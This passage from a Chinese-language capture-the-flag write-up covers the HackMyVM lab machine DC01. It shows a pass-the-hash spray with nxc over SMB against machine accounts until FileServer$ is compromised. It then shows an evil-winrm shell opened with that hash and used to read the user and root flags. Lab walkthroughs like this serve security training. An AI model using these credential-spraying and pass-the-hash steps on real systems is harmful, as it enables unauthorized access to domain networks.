# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 48fc7eca9af236d7849273990f6c5117
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
尝试进行破解:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali💀kali)-[~/temp/DC01]
└─$ nxc smb $IP -u user -H hash_pass
SMB 192.168.10.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\FileServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MailServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\BackupServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ApplicationServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\PrintServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ProxyServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MonitoringServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\FileServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MailServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\BackupServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ApplicationServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\PrintServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ProxyServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MonitoringServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\FileServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MailServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\BackupServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ApplicationServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\PrintServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\ProxyServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\MonitoringServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 192.168.10.106 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
得到一处用户密码!
寻找flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
┌──(kali💀kali)-[~/temp/DC01]
└─$ evil-winrm -i $IP -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents> cd ../../
*Evil-WinRM* PS C:\Users> dir /s *.txt
Cannot find path 'C:\s' because it does not exist.
At line:1 char:1
+ dir /s *.txt
+ ~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\s:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users> ls -la
A parameter cannot be found that matches parameter name 'la'.
At line:1 char:4
+ ls -la
+ ~~~
+ CategoryInfo : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException
+ FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users> clear
*Evil-WinRM* PS C:\Users> cls
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/15/2024 12:56 PM Administrator
d----- 8/16/2024 12:28 PM FileServer$
d-r--- 6/15/2024 10:54 AM Public
d----- 6/17/2024 10:24 AM ybob317
*Evil-WinRM* PS C:\Users> cd ybob317
*Evil-WinRM* PS C:\Users\ybob317> dir
Directory: C:\Users\ybob317
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/17/2024 10:24 AM 3D Objects
d-r--- 6/17/2024 10:24 AM Contacts
d-r--- 6/17/2024 10:45 AM Desktop
d-r--- 6/17/2024 10:24 AM Documents
d-r--- 6/17/2024 10:24 AM Downloads
d-r--- 6/17/2024 10:24 AM Favorites
d-r--- 6/17/2024 10:24 AM Links
d-r--- 6/17/2024 10:24 AM Music
d-r--- 6/17/2024 10:24 AM Pictures
d-r--- 6/17/2024 10:24 AM Saved Games
d-r--- 6/17/2024 10:24 AM Searches
d-r--- 6/17/2024 10:24 AM Videos
*Evil-WinRM* PS C:\Users\ybob317> cd Desktop
*Evil-WinRM* PS C:\Users\ybob317\Desktop> dir
Directory: C:\Users\ybob317\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2024 4:54 AM 32 user.txt
*Evil-WinRM* PS C:\Users\ybob317\Desktop> type user.txt
xxxxxxxxxx
*Evil-WinRM* PS C:\Users\ybob317\Desktop> cd ../../Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/17/2024 10:41 AM backup
-a---- 6/17/2024 10:44 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
xxxxxxxxxx
路途艰辛啊,好在结果是好的。。。。。
参考
https://mikannse.space/2024/07/14/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E4%B8%80%E4%B8%80%E5%85%AB)%E4%B9%8BHMVDC01/
https://github.com/Brntpcnr/WriteupsHMV/blob/main/DC01.txt
https://y4er.com/posts/kerberos-kerberoasting-spn/
https://gaznetsystems.com/Hackmyvm/Easy/DC01
本文由作者按照 CC BY 4.0 进行授权